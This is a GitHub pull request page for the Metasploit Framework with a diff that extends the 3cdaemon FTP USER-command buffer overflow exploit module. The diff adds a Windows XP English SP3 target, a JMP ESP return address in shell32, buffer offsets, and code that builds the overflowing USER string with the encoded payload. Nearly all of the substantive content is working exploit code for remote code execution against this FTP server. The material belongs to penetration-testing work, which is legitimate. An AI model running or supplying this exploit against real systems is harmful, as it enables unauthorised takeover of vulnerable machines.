Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP

Loading…

Add Windows SP3 to targets for 3cdaemon FTP #268

Merged
merged 1 commit into from

2 participants

@olliwolli

Using jmp esp instead of seh for sp3

@wchen-r7 wchen-r7 merged commit 30a3d8b into rapid7:master
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Mar 23, 2012
  1. @olliwolli

    Add Windows SP3 to targets.

    olliwolli authored
This page is out of date. Refresh to see the latest.
Showing with 34 additions and 7 deletions.
  1. +34 −7 modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
View
41 modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
@@ -5,8 +5,8 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
##
require 'msf/core'
@@ -26,7 +26,11 @@ def initialize(info = {})
web site and is recommended in numerous support documents.
This module uses the USER command to trigger the overflow.
},
- 'Author' => [ 'hdm' ],
+ 'Author' =>
+ [
+ 'hdm', # Original author
+ 'otr' # Windows XP SP3
+ ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
@@ -37,6 +41,11 @@ def initialize(info = {})
[ 'BID', '12155'],
[ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],
],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'seh',
+ 'target' => 0
+ },
'Privileged' => false,
'Payload' =>
{
@@ -55,6 +64,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x75022ac4, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -62,6 +72,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x71aa32ad, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -69,6 +80,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x77681799, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -76,9 +88,18 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x775F29D0,
+ 'Offset' => 229,
+ },
+ ],
+ [
+ 'Windows XP English SP3',
+ {
+ 'Platform' => 'win',
+ 'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
+ #'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1
+ 'Offset' => 245,
},
],
-
],
'DisclosureDate' => 'Jan 4 2005'))
end
@@ -97,9 +118,15 @@ def exploit
print_status("Trying target #{target.name}...")
- buf = rand_text_english(2048, payload_badchars)
- seh = generate_seh_payload(target.ret)
- buf[229, seh.length] = seh
+ if (target == targets[4])
+ buf = rand_text_english(target['Offset'], payload_badchars)
+ buf << [ target['Ret'] ].pack('V') * 2
+ buf << payload.encoded
+ else
+ buf = rand_text_english(2048, payload_badchars)
+ seh = generate_seh_payload(target.ret)
+ buf[target['Offset'], seh.length] = seh
+ end
send_cmd( ['USER', buf] , false )
Something went wrong with that request. Please try again.